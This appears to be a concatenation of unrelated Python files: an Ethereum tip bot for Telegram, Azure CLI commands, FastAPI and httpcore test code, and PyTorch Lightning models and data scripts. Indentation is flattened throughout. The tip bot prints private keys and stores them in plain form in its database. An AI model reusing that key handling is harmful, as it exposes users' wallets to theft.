Check username on change in the bot
"""
def check_username_on_change(self):
_is_username_in_db = self.col_users.find_one({"UserName": self.username}) is not None if self.username is not None else True
if not _is_username_in_db:
self.col_users.update(
{
"_id": self.user_id
},
{
"$set":
{
"UserName": self.username
}
}
)
"""
Create new wallet for new bot member
"""
def create_user_wallet(self):
acct = self.w3.eth.account.create('%s %s %s' % (self.user_id, self.first_name, randint(10000, 1000000)))
print(acct.address, acct.privateKey.hex())
return acct.address, acct.privateKey.hex()
"""
Check user balance
"""
def check_balance(self):
balance = self.w3.fromWei(self.w3.eth.getBalance(self.address), 'ether')
return balance
"""
Get the user's deposit address
"""
def get_user_address(self):
try:
_user = self.col_users.find_one({"_id": self.user_id})
return _user['Address']
except Exception as exc:
print(exc)
return None
"""
Withdraw coins to address with params:
address
amount
"""
def withdraw_coins(self, address, amount):
try:
try:
amount = float(amount)
except Exception as exc:
self.bot.send_message(self.user_id,
dictionary['incorrect_amount'],
parse_mode='HTML')
print(exc)
balance = self.check_balance()
if balance > amount:
to_address = self.w3.toChecksumAddress(address)
gas = 21000
gas_price = self.w3.eth.gasPrice
txn = \
{
'from': self.address,
'gas': gas,
'to': to_address,
'value': self.w3.toWei(amount, 'ether') - (gas*gas_price),
'gasPrice': gas_price,
'nonce': self.w3.eth.getTransactionCount(self.address),
}
_private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey']
signed_txn = self.w3.eth.account.signTransaction(txn,
private_key=_private_key)
if options.toothless:
tx = signed_txn.hash.hex()
else:
tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction)
tx = self.w3.toHex(tx)
self.bot.send_message(self.user_id,
dictionary['withdrawal_result'] % (amount, address, tx),
parse_mode='HTML')
else:
self.bot.send_message(self.user_id,
dictionary['incorrect_balance'] % balance,
parse_mode='HTML')
except Exception as exc:
print(exc)
"""
Donate to address
"""
def donate(self, amount):
try:
try:
amount = float(amount)
except Exception as exc:
self.bot.send_message(self.user_id,
dictionary['incorrect_amount'],
parse_mode='HTML')
print(exc)
balance = self.check_balance()
if balance > amount:
to_address = self.w3.toChecksumAddress(donate_address)
gas = 21000
gas_price = self.w3.eth.gasPrice
txn = \
{
'from': self.address,
'gas': gas,
'to': to_address,
'value': self.w3.toWei(amount, 'ether') - (gas*gas_price),
'gasPrice': gas_price,
'nonce': self.w3.eth.getTransactionCount(self.address),
}
_private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey']
signed_txn = self.w3.eth.account.signTransaction(txn,
private_key=_private_key)
if options.toothless:
tx = signed_txn.hash.hex()
else:
tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction)
tx = self.w3.toHex(tx)
self.bot.send_message(self.user_id,
dictionary['donate_result'] % (balance, tx),
parse_mode='HTML')
else:
self.bot.send_message(self.user_id,
dictionary['incorrect_balance'] % balance,
parse_mode='HTML')
except Exception as exc:
print(exc)
"""
Tip user with params:
username
amount
"""
def tip_user(self, username, amount, coin=conf['currency']):
try:
try:
amount = float(amount)
except Exception as exc:
self.bot.send_message(self.user_id,
dictionary['incorrect_amount'],
parse_mode='HTML')
print(exc)
username = username.replace('@', '')
_user = self.col_users.find_one({"UserName": username})
_is_username_exists = _user is not None
if not _is_username_exists:
self.bot.send_message(self.user_id,
dictionary['username_error'],
parse_mode='HTML')
return
self.send_tip(_user['_id'], _user['Address'], amount, coin)
except Exception as exc:
print(exc)
"""
Send a tip to user in the chat
"""
def tip_in_the_chat(self, amount, coin=conf['currency']):
try:
try:
amount = float(amount)
except Exception as exc:
self.bot.send_message(self.user_id,
dictionary['incorrect_amount'],
parse_mode='HTML')
print(exc)
_user = self.col_users.find_one({"_id": self.message.reply_to_message.from_user.id})
self.send_tip(self.message.reply_to_message.from_user.id, _user['Address'], amount, coin)
except Exception as exc:
print(exc)
"""
Send tip to user with params
user_id - user identifier
address - user address
amount - amount of a tip
"""
def send_tip(self, user_id, address, amount, coin):
try:
balance = self.check_balance()
if balance > amount:
gas = 21000
gas_price = self.w3.eth.gasPrice
txn = \
{
'from': self.address,
'gas': gas,
'to': address,
'value': self.w3.toWei(amount, 'ether') - (gas*gas_price),
'gasPrice': gas_price,
'nonce': self.w3.eth.getTransactionCount(self.address),
}
_private_key = self.col_users.find_one({"_id": self.user_id})[
'PrivateKey']
signed_txn = self.w3.eth.account.signTransaction(txn,
private_key=_private_key)
if options.toothless:
tx = signed_txn.hash.hex()
else:
tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction)
tx = self.w3.toHex(tx)
self.bot.send_message(user_id,
dictionary['tip_recieved'] % (amount, coin, tx),
parse_mode='HTML')
self.bot.send_message(self.user_id,
dictionary['tip_sent'] % (amount, coin, tx),
parse_mode='HTML')
else:
self.bot.send_message(self.user_id,
dictionary['incorrect_balance'] % (coin, balance),
parse_mode='HTML')
except Exception as exc:
print(exc)
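# Note on fee handling (illustrative): each transfer above sends
# toWei(amount, 'ether') - gas * gasPrice as the transaction value, so the recipient
# receives the tip net of the 21000-gas transfer fee and the sender spends roughly
# toWei(amount) in total.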
def main():
w3 = Web3(HTTPProvider(http_provider))
while True:
try:
TipBot(w3=w3)
except Exception as e:
if "Timed out" not in str(e):
traceback.print_exc()
print(e)
if __name__ == '__main__':
main()
``` |
{
"source": "00Kai0/autorest.az",
"score": 2
} |
#### File: azext_managed_network/generated/custom.py
```python
from azure.cli.core.util import sdk_no_wait
def managed_network_mn_list(client,
resource_group_name=None,
top=None,
skiptoken=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name,
top=top,
skiptoken=skiptoken)
return client.list_by_subscription(top=top,
skiptoken=skiptoken)
def managed_network_mn_create(client,
resource_group_name,
managed_network_name,
location,
tags=None,
properties=None):
return client.create_or_update(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
location=location,
tags=tags,
properties=properties)
def managed_network_mn_update(client,
resource_group_name,
managed_network_name,
tags=None):
return client.begin_update(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
tags=tags)
def managed_network_mn_delete(client,
resource_group_name,
managed_network_name):
return client.begin_delete(resource_group_name=resource_group_name,
managed_network_name=managed_network_name)
def managed_network_mn_get_modify(client,
resource_group_name,
managed_network_name):
return client.get_modify(resource_group_name=resource_group_name,
managed_network_name=managed_network_name)
def managed_network_mn_scope_assignment_list(client,
scope):
return client.list(scope=scope)
def managed_network_mn_scope_assignment_show(client,
scope,
scope_assignment_name):
return client.get(scope=scope,
scope_assignment_name=scope_assignment_name)
def managed_network_mn_scope_assignment_create(client,
scope,
scope_assignment_name,
location,
assigned_managed_network=None):
return client.create_or_update(scope=scope,
scope_assignment_name=scope_assignment_name,
location=location,
assigned_managed_network=assigned_managed_network)
def managed_network_mn_scope_assignment_update(client,
scope,
scope_assignment_name,
location,
assigned_managed_network=None):
return client.create_or_update(scope=scope,
scope_assignment_name=scope_assignment_name,
location=location,
assigned_managed_network=assigned_managed_network)
def managed_network_mn_scope_assignment_delete(client,
scope,
scope_assignment_name):
return client.delete(scope=scope,
scope_assignment_name=scope_assignment_name)
def managed_network_mn_group_list(client,
resource_group_name,
managed_network_name,
top=None,
skiptoken=None):
return client.list_by_managed_network(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
top=top,
skiptoken=skiptoken)
def managed_network_mn_group_show(client,
resource_group_name,
managed_network_name,
group_name):
return client.get(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_group_name=group_name)
def managed_network_mn_group_create(client,
resource_group_name,
managed_network_name,
group_name,
location,
management_groups=None,
subscriptions=None,
virtual_networks=None,
subnets=None,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_group_name=group_name,
location=location,
management_groups=management_groups,
subscriptions=subscriptions,
virtual_networks=virtual_networks,
subnets=subnets)
def managed_network_mn_group_update(client,
resource_group_name,
managed_network_name,
group_name,
location,
management_groups=None,
subscriptions=None,
virtual_networks=None,
subnets=None,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_group_name=group_name,
location=location,
management_groups=management_groups,
subscriptions=subscriptions,
virtual_networks=virtual_networks,
subnets=subnets)
def managed_network_mn_group_delete(client,
resource_group_name,
managed_network_name,
group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_group_name=group_name)
def managed_network_managed_network_peering_policy_list(client,
resource_group_name,
managed_network_name,
top=None,
skiptoken=None):
return client.list_by_managed_network(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
top=top,
skiptoken=skiptoken)
def managed_network_managed_network_peering_policy_show(client,
resource_group_name,
managed_network_name,
policy_name):
return client.get(resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_peering_policy_name=policy_name)
def managed_network_managed_network_peering_policy_hub_and_spoke_topology_create(client,
resource_group_name,
managed_network_name,
policy_name,
location,
hub=None,
spokes=None,
mesh=None,
no_wait=False):
properties = {}
properties['type'] = 'HubAndSpokeTopology'
properties['hub'] = hub
properties['spokes'] = spokes
properties['mesh'] = mesh
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_peering_policy_name=policy_name,
location=location,
properties=properties)
def managed_network_managed_network_peering_policy_mesh_topology_create(client,
resource_group_name,
managed_network_name,
policy_name,
location,
hub=None,
spokes=None,
mesh=None,
no_wait=False):
properties = {}
properties['type'] = 'MeshTopology'
properties['hub'] = hub
properties['spokes'] = spokes
properties['mesh'] = mesh
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_peering_policy_name=policy_name,
location=location,
properties=properties)
def managed_network_managed_network_peering_policy_hub_and_spoke_topology_update(instance,
resource_group_name,
managed_network_name,
policy_name,
location,
hub=None,
spokes=None,
mesh=None,
no_wait=False):
instance.type = 'HubAndSpokeTopology'
if hub is not None:
instance.hub = hub
if spokes is not None:
instance.spokes = spokes
if mesh is not None:
instance.mesh = mesh
return instance
def managed_network_managed_network_peering_policy_mesh_topology_update(instance,
resource_group_name,
managed_network_name,
policy_name,
location,
hub=None,
spokes=None,
mesh=None,
no_wait=False):
instance.type = 'MeshTopology'
if hub is not None:
instance.hub = hub
if spokes is not None:
instance.spokes = spokes
if mesh is not None:
instance.mesh = mesh
return instance
def managed_network_managed_network_peering_policy_delete(client,
resource_group_name,
managed_network_name,
policy_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
resource_group_name=resource_group_name,
managed_network_name=managed_network_name,
managed_network_peering_policy_name=policy_name)
``` |
{
"source": "00Kai0/databases",
"score": 3
} |
#### File: databases/databases/interfaces.py
```python
import typing
from sqlalchemy.engine import RowProxy
from sqlalchemy.sql import ClauseElement
class DatabaseBackend:
async def connect(self) -> None:
raise NotImplementedError() # pragma: no cover
async def disconnect(self) -> None:
raise NotImplementedError() # pragma: no cover
def connection(self) -> "ConnectionBackend":
raise NotImplementedError() # pragma: no cover
class ConnectionBackend:
async def acquire(self) -> None:
raise NotImplementedError() # pragma: no cover
async def release(self) -> None:
raise NotImplementedError() # pragma: no cover
async def fetch_all(self, query: ClauseElement) -> typing.List[RowProxy]:
raise NotImplementedError() # pragma: no cover
async def fetch_one(self, query: ClauseElement) -> RowProxy:
raise NotImplementedError() # pragma: no cover
async def execute(self, query: ClauseElement, values: dict = None) -> None:
raise NotImplementedError() # pragma: no cover
async def execute_many(self, query: ClauseElement, values: list) -> None:
raise NotImplementedError() # pragma: no cover
async def iterate(
self, query: ClauseElement
) -> typing.AsyncGenerator[RowProxy, None]:
raise NotImplementedError() # pragma: no cover
# mypy needs async iterators to contain a `yield`
# https://github.com/python/mypy/issues/5385#issuecomment-407281656
yield True # pragma: no cover
def transaction(self) -> "TransactionBackend":
raise NotImplementedError() # pragma: no cover
class TransactionBackend:
async def start(self, is_root: bool) -> None:
raise NotImplementedError() # pragma: no cover
async def commit(self) -> None:
raise NotImplementedError() # pragma: no cover
async def rollback(self) -> None:
raise NotImplementedError() # pragma: no cover
``` |
{
"source": "00Kai0/fastapi",
"score": 3
} |
#### File: app/routers/items.py
```python
from fastapi import APIRouter
router = APIRouter()
@router.get("/", tags=["items"])
async def read_items():
return [{"name": "Item Foo"}, {"name": "item Bar"}]
@router.get("/{item_id}", tags=["items"])
async def read_item(item_id: str):
return {"name": "Fake Specific Item", "item_id": item_id}
``` |
{
"source": "00Kai0/httpcore",
"score": 2
} |
#### File: httpcore/tests/conftest.py
```python
import asyncio
import pytest
import trustme
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
)
from uvicorn.config import Config
from uvicorn.main import Server
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"] == "/slow_response":
await slow_response(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await asyncio.sleep(0.1)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
class CAWithPKEncryption(trustme.CA):
"""Implementation of trustme.CA() that can emit
private keys that are encrypted with a password.
"""
@property
def encrypted_private_key_pem(self):
return trustme.Blob(
self._private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
@pytest.fixture
def example_cert():
ca = CAWithPKEncryption()
ca.issue_cert("example.org")
return ca
@pytest.fixture
def cert_pem_file(example_cert):
with example_cert.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture
def cert_private_key_file(example_cert):
with example_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture
def cert_encrypted_private_key_file(example_cert):
with example_cert.encrypted_private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture
async def server():
config = Config(app=app, lifespan="off")
server = Server(config=config)
task = asyncio.ensure_future(server.serve())
try:
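        # poll until uvicorn reports startup, then hand the live server to the test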
while not server.started:
await asyncio.sleep(0.0001)
yield server
finally:
server.should_exit = True
await task
@pytest.fixture
async def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
port=8001,
)
server = Server(config=config)
task = asyncio.ensure_future(server.serve())
try:
while not server.started:
await asyncio.sleep(0.0001)
yield server
finally:
server.should_exit = True
await task
```
#### File: httpcore/tests/test_utils.py
```python
import pytest
from httpx.utils import guess_json_utf
@pytest.mark.parametrize(
"encoding",
(
"utf-32",
"utf-8-sig",
"utf-16",
"utf-8",
"utf-16-be",
"utf-16-le",
"utf-32-be",
"utf-32-le",
),
)
def test_encoded(encoding):
data = "{}".encode(encoding)
assert guess_json_utf(data) == encoding
def test_bad_utf_like_encoding():
assert guess_json_utf(b"\x00\x00\x00\x00") is None
@pytest.mark.parametrize(
("encoding", "expected"),
(
("utf-16-be", "utf-16"),
("utf-16-le", "utf-16"),
("utf-32-be", "utf-32"),
("utf-32-le", "utf-32"),
),
)
def test_guess_by_bom(encoding, expected):
data = u"\ufeff{}".encode(encoding)
assert guess_json_utf(data) == expected
``` |
{
"source": "00Kai0/nativeauthenticator",
"score": 3
} |
#### File: nativeauthenticator/nativeauthenticator/orm.py
```python
import bcrypt
import re
from jupyterhub.orm import Base
from sqlalchemy import Boolean, Column, Integer, String, LargeBinary
from sqlalchemy.orm import validates
class UserInfo(Base):
__tablename__ = 'users_info'
id = Column(Integer, primary_key=True, autoincrement=True)
username = Column(String, nullable=False)
password = Column(LargeBinary, nullable=False)
is_authorized = Column(Boolean, default=False)
email = Column(String)
@classmethod
def find(cls, db, username):
"""Find a user info record by name.
Returns None if not found"""
return db.query(cls).filter(cls.username == username).first()
def is_valid_password(self, password):
"""Checks if a password passed matches the
password stored"""
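        # bcrypt.hashpw re-uses the salt embedded in the stored hash, so hashing the candidate with the stored value reproduces the hash only on a match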
encoded_pw = bcrypt.hashpw(password.encode(), self.password)
return encoded_pw == self.password
@classmethod
def change_authorization(cls, db, username):
user = db.query(cls).filter(cls.username == username).first()
user.is_authorized = not user.is_authorized
db.commit()
return user
@validates('email')
def validate_email(self, key, address):
if not address:
return
assert re.match(r"^[A-Za-z0-9\.\+_-]+@[A-Za-z0-9\._-]+\.[a-zA-Z]*$",
address)
return address
``` |
{
"source": "00krishna-research/lightning-graph-graphsage",
"score": 2
} |
#### File: src/models/graphsage_model.py
```python
from typing import Any, List, NamedTuple
from torchmetrics import MaxMetric
import torch
from torch import Tensor
import torch.nn.functional as F
from torch.nn import ModuleList, BatchNorm1d
from torch_sparse import SparseTensor
from torchmetrics import Accuracy
from pytorch_lightning import LightningModule
import torch_geometric.transforms as T
from torch_geometric.nn import SAGEConv
class Batch(NamedTuple):
x: Tensor
y: Tensor
adjs_t: List[SparseTensor]
class GraphSAGELitModel(LightningModule):
def __init__(self,
in_channels: int,
out_channels: int,
hidden_channels: int = 256,
num_layers: int = 2,
dropout: float = 0.5,
lr: float = 0.001,
weight_decay: float = 0.0005):
super().__init__()
self.save_hyperparameters()
self.dropout = dropout
self.convs = ModuleList()
self.convs.append(SAGEConv(in_channels, hidden_channels))
for _ in range(num_layers - 2):
self.convs.append(SAGEConv(hidden_channels, hidden_channels))
self.convs.append(SAGEConv(hidden_channels, out_channels))
self.bns = ModuleList()
for _ in range(num_layers - 1):
self.bns.append(BatchNorm1d(hidden_channels))
self.train_acc = Accuracy()
self.val_acc = Accuracy()
self.test_acc = Accuracy()
# for logging best so far validation accuracy
self.val_acc_best = MaxMetric()
def forward(self, x: Tensor, adjs_t: List[SparseTensor]) -> Tensor:
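        # each sampled hop is a bipartite graph: the first adj_t.size(0) rows of x are the target nodes for that layer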
for i, adj_t in enumerate(adjs_t):
x = self.convs[i]((x, x[:adj_t.size(0)]), adj_t)
if i < len(adjs_t) - 1:
x = self.bns[i](x)
x = x.relu_()
x = F.dropout(x, p=self.dropout, training=self.training)
return x
def training_step(self, batch: Batch, batch_idx: int):
x, y, adjs_t = batch
y_hat = self(x, adjs_t)
train_loss = F.cross_entropy(y_hat, y)
self.train_acc(y_hat.softmax(dim=-1), y)
self.log('train_acc', self.train_acc, prog_bar=True, on_step=False,
on_epoch=True)
return train_loss
def validation_step(self, batch: Batch, batch_idx: int):
x, y, adjs_t = batch
y_hat = self(x, adjs_t)
self.val_acc(y_hat.softmax(dim=-1), y)
self.log('val_acc', self.val_acc, prog_bar=True, on_step=False,
on_epoch=True)
def test_step(self, batch: Batch, batch_idx: int):
x, y, adjs_t = batch
y_hat = self(x, adjs_t)
self.test_acc(y_hat.softmax(dim=-1), y)
self.log('test_acc', self.test_acc, prog_bar=True, on_step=False,
on_epoch=True)
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(),
lr=self.hparams.lr,
weight_decay=self.hparams.weight_decay)
``` |
{
"source": "00krishna-research/lightning-nlp-tweet-classification",
"score": 2
} |
#### File: src/datamodules/disastertweet_datamodule.py
```python
from typing import Optional, Tuple
import torch
from pytorch_lightning import LightningDataModule
from torch.utils.data import ConcatDataset, DataLoader, Dataset, random_split
from torchvision.datasets import MNIST
from torchvision.transforms import transforms
import string
from collections import Counter
from typing import Optional
import numpy as np
import pandas as pd
import pytorch_lightning as pl
import torch
import torch.utils.data
from torch.utils.data import Dataset
class DisasterTweetsDataModule(pl.LightningDataModule):
def __init__(self,
tweets_data_path,
batch_size,
num_workers=0,
                 embeddings_path=None,  # path to pretrained embeddings; stored below for later use
                 pin_memory=True):
super().__init__()
self.num_workers = num_workers
self.tweets_data_path = tweets_data_path
self.embeddings_path = embeddings_path
self.batch_size = batch_size
self.pin_memory = pin_memory
def setup(self, stage: Optional[str] = None):
tweets_df = pd.read_csv(self.tweets_data_path)
def train_dataloader(self):
return DataLoader(
self.train_ds,
batch_size=self.batch_size,
shuffle=True,
drop_last=True,
pin_memory=self.pin_memory,
num_workers=self.num_workers
)
def val_dataloader(self):
return DataLoader(
self.val_ds,
batch_size=self.batch_size,
shuffle=False,
drop_last=False,
pin_memory=self.pin_memory,
num_workers=self.num_workers
)
def test_dataloader(self):
return DataLoader(
self.test_ds,
batch_size=self.batch_size,
shuffle=False,
drop_last=False,
pin_memory=self.pin_memory,
num_workers=self.num_workers
)
```
#### File: src/datamodules/scratch_disasterdata.py
```python
import collections
import numpy as np
import pandas as pd
import re
import spacy
from torchtext.legacy.data import Field
from torchtext.data import Field, TabularDataset, BucketIterator
from typing import Optional, Tuple
import torch
from pytorch_lightning import LightningDataModule
from torch.utils.data import ConcatDataset, DataLoader, Dataset, random_split
from torchvision.datasets import MNIST
from torchvision.transforms import transforms
import string
from typing import Optional
import pandas as pd
import pytorch_lightning as pl
TRAINPCT = 0.8
TESTPCT = 0.2
# Read raw data
tweets = pd.read_csv("data/train.csv", header=0)
# Create training/test/validation split
def train_test_val_split(x, trainpct=0.8):
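    # two independent uniform draws: the first splits train vs. test, the second carves a validation slice out of the training portion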
r1, r2 = np.random.random(2)
if r1 <= trainpct:
res = "train"
else:
res = "test"
if res=="train" and r2 <= trainpct:
res = "train"
elif res=="train" and r2 > trainpct:
res = "val"
else:
pass
return res
# Preprocess the reviews
def preprocess_text(text):
text = ' '.join(word.lower() for word in text.split(" "))
text = re.sub(r"([.,!?])", r" \1 ", text)
text = re.sub(r"[^a-zA-Z.,!?]+", r" ", text)
return text
tweets["split"] = 0
tweets["split"] = tweets.split.apply(train_test_val_split)
tweets["text"] = tweets.text.apply(preprocess_text)
# Write munged data to CSV
tweets.to_csv("output.csv", index=False)
spacy_en = spacy.load("en")
def tokenize(text):
return [tok.text for tok in spacy_en.tokenizer(text)]
quote = Field(sequential=True, use_vocab=True, tokenize=tokenize, lower=True)
score = Field(sequential=False, use_vocab=False)
fields = {"quote": ("q", quote), "score": ("s", score)}
train_data, test_data = TabularDataset.splits(
path="mydata", train="train.json", test="test.json", format="json", fields=fields
)
```
#### File: src/datamodules/scratch_torchtext2.py
```python
import torchtext
import torch
from torchtext.datasets import IMDB
from torchtext.data.utils import get_tokenizer
from collections import Counter
from torchtext.vocab import Vocab
from torch.utils.data import DataLoader
from torch.nn.utils.rnn import pad_sequence
tokenizer = get_tokenizer('basic_english')
train_iter = IMDB(split='train')
counter = Counter()
for (label, line) in train_iter:
counter.update(tokenizer(line))
vocab = Vocab(counter, min_freq=10, specials=('<unk>', '<BOS>', '<EOS>', '<PAD>'))
text_transform = lambda x: [vocab['<BOS>']] + [vocab[token] for token in tokenizer(x)] + [vocab['<EOS>']]
label_transform = lambda x: 1 if x == 'pos' else 0
def collate_batch(batch):
label_list, text_list = [], []
for (_label, _text) in batch:
label_list.append(label_transform(_label))
processed_text = torch.tensor(text_transform(_text))
text_list.append(processed_text)
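    # padding_value=3.0 is the index of '<PAD>' in the specials tuple passed to Vocab above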
return torch.tensor(label_list), pad_sequence(text_list, padding_value=3.0)
train_iter = IMDB(split='train')
train_dataloader = DataLoader(list(train_iter), batch_size=2, shuffle=True,
collate_fn=collate_batch)
print(next(iter(train_dataloader)))
```
#### File: src/datamodules/scratch_torchtext4.py
```python
import torchtext
import torch
from torchtext.datasets import IMDB, AG_NEWS
from torchtext.data.utils import get_tokenizer
from collections import Counter
from torchtext.vocab import Vocab, build_vocab_from_iterator
from torch.utils.data import DataLoader
from torch.nn.utils.rnn import pad_sequence
from torchtext.vocab import GloVe
import torch.nn as nn
import numpy as np
tokenizer = get_tokenizer('basic_english')
train_iter = AG_NEWS(split='train')
def yield_tokens(data_iter):
for _, text in data_iter:
yield tokenizer(text)
vocab = build_vocab_from_iterator(yield_tokens(train_iter), specials=["<unk>"])
vocab.set_default_index(vocab["<unk>"])
emb_dim = 100
# get pretrained glove vectors
glove = GloVe(name = '6B',
dim = emb_dim)
# create a tensor used for holding the pre-trained vectors for each element of the vocab
pretrained_embedding = torch.zeros(len(vocab), emb_dim)
# get the pretrained vector's vocab, Dict[str, int]
# pretrained_vocab = glove.vectors.get_stoi()
pretrained_vocab = glove.stoi
for idx, token in enumerate(vocab.get_itos()):
if token in pretrained_vocab:
pretrained_vector = glove[token] # pretrained_vector is a FloatTensor pre-trained vector for `token`
pretrained_embedding[idx] = pretrained_vector # update the appropriate row in pretrained_embedding
print(pretrained_embedding[1])
class SentimentLSTM(nn.Module):
def __init__(self, n_vocab, n_embed, n_hidden, n_output, n_layers, drop_p = 0.8):
super().__init__()
self.n_vocab = n_vocab
self.n_layers = n_layers
self.n_hidden = n_hidden
self.embedding = nn.Embedding(n_vocab, n_embed)
self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p)
self.dropout = nn.Dropout(drop_p)
self.fc = nn.Linear(n_hidden, n_output)
self.sigmoid = nn.Sigmoid()
def forward (self, input_words):
embedded_words = self.embedding(input_words)
lstm_out, h = self.lstm(embedded_words)
lstm_out = self.dropout(lstm_out)
lstm_out = lstm_out.contiguous().view(-1, self.n_hidden)
fc_out = self.fc(lstm_out)
sigmoid_out = self.sigmoid(fc_out)
        sigmoid_out = sigmoid_out.view(input_words.size(0), -1)  # infer the batch size from the input; batch_size is not defined in this scope
sigmoid_last = sigmoid_out[:, -1]
return sigmoid_last, h
def init_hidden (self, batch_size):
device = "cpu"
weights = next(self.parameters()).data
h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device),
weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device))
return h
nb_samples = 100
features = torch.randint(0, 10000, (nb_samples, 2))
labels = torch.empty(nb_samples, dtype=torch.long).random_(10)
dataset = torch.utils.data.TensorDataset(features, labels)
loader = DataLoader(
dataset,
batch_size=2
)
def pad_text(txt, seq_length):
if len(txt) >= seq_length:
res = txt[:seq_length]
else:
res = ['']*(seq_length-len(txt)) + txt
return res
def convert_unknowns(list_input, unknown_index):
return list(map(lambda x: unknown_index if x=="" else x, list_input))
def tpipeline(x,seq_length, unknown_index=0):
res = vocab(tokenizer(x))
res = pad_text(res, seq_length)
res = map(lambda x: 0 if x=="" else x, res)
return list(res)
def tpipeline_testing(x,seq_length, unknown_index=0):
res = pad_text(x, seq_length)
res = list(map(lambda x: unknown_index if x=="" else x, res))
return res
text_pipeline = lambda x: vocab(tokenizer(x))
label_pipeline = lambda x: x.long()
class MyCollator(object):
def __init__(self, seq_length):
self.seq_length = seq_length
def __call__(self, batch):
label_list, text_list = [], []
for (_label, _text) in batch:
label_list.append(label_pipeline(_label))
processed_text = torch.tensor(tpipeline(_text, self.seq_length), dtype=torch.int64)
text_list.append(processed_text)
label_list = torch.tensor(label_list, dtype=torch.int64)
        text_list = torch.stack(text_list).to(torch.float32)  # a list of tensors cannot be passed to torch.tensor(); stack the equal-length padded samples instead
return text_list, label_list
class MyOtherCollator(object):
def __init__(self, seq_length, unknown_index=0):
self.seq_length = seq_length
self.unknown_index = unknown_index
def __call__(self, batch):
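        # pad/truncate every sample to seq_length, map empty slots to unknown_index, then stack into a single LongTensor batch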
text, label = list(zip(*batch))
texts = list(map(lambda x: x.tolist(), text))
#texts = list(map(lambda x: vocab(tokenizer(x)), texts))
texts = list(map(lambda x: pad_text(x, self.seq_length), texts))
texts = list(map(lambda x: convert_unknowns(x, self.unknown_index), texts))
ttexts = list(map(lambda x: torch.LongTensor(x), texts))
return torch.stack(ttexts), torch.stack(label)
collate_batch = MyOtherCollator(5, 0)
dataloader = DataLoader(dataset, batch_size=8, shuffle=False, collate_fn=collate_batch)
dl_without_collate = DataLoader(dataset, batch_size=8, shuffle=False)
print(next(iter(dataloader)))
print(next(iter(dl_without_collate)))
``` |
{
"source": "00krishna-research/lightning-rl-deep-q-learning",
"score": 3
} |
#### File: src/common/cli.py
```python
import argparse
def add_base_args(parent) -> argparse.ArgumentParser:
"""
    Adds arguments for the DQN model.
    Note: these params are fine-tuned for the Pong env.
    Args:
        parent: parent argument parser
"""
arg_parser = argparse.ArgumentParser(parents=[parent])
arg_parser.add_argument("--algo", type=str, default="dqn", help="algorithm to use for training")
arg_parser.add_argument("--batch_size", type=int, default=32, help="size of the batches")
arg_parser.add_argument("--lr", type=float, default=1e-4, help="learning rate")
arg_parser.add_argument("--env", type=str, default="PongNoFrameskip-v4", help="gym environment tag")
arg_parser.add_argument("--gamma", type=float, default=0.99, help="discount factor")
arg_parser.add_argument("--episode_length", type=int, default=500, help="max length of an episode")
arg_parser.add_argument("--max_episode_reward", type=int, default=18,
help="max episode reward in the environment")
arg_parser.add_argument("--max_steps", type=int, default=500000,
help="max steps to train the agent")
arg_parser.add_argument("--n_steps", type=int, default=4,
help="how many steps to unroll for each update")
arg_parser.add_argument("--gpus", type=int, default=1,
help="number of gpus to use for training")
arg_parser.add_argument("--seed", type=int, default=123,
help="seed for training run")
arg_parser.add_argument("--backend", type=str, default="dp",
help="distributed backend to be used by lightning")
return arg_parser
``` |
{
"source": "00krishna-sandbox/gdelt",
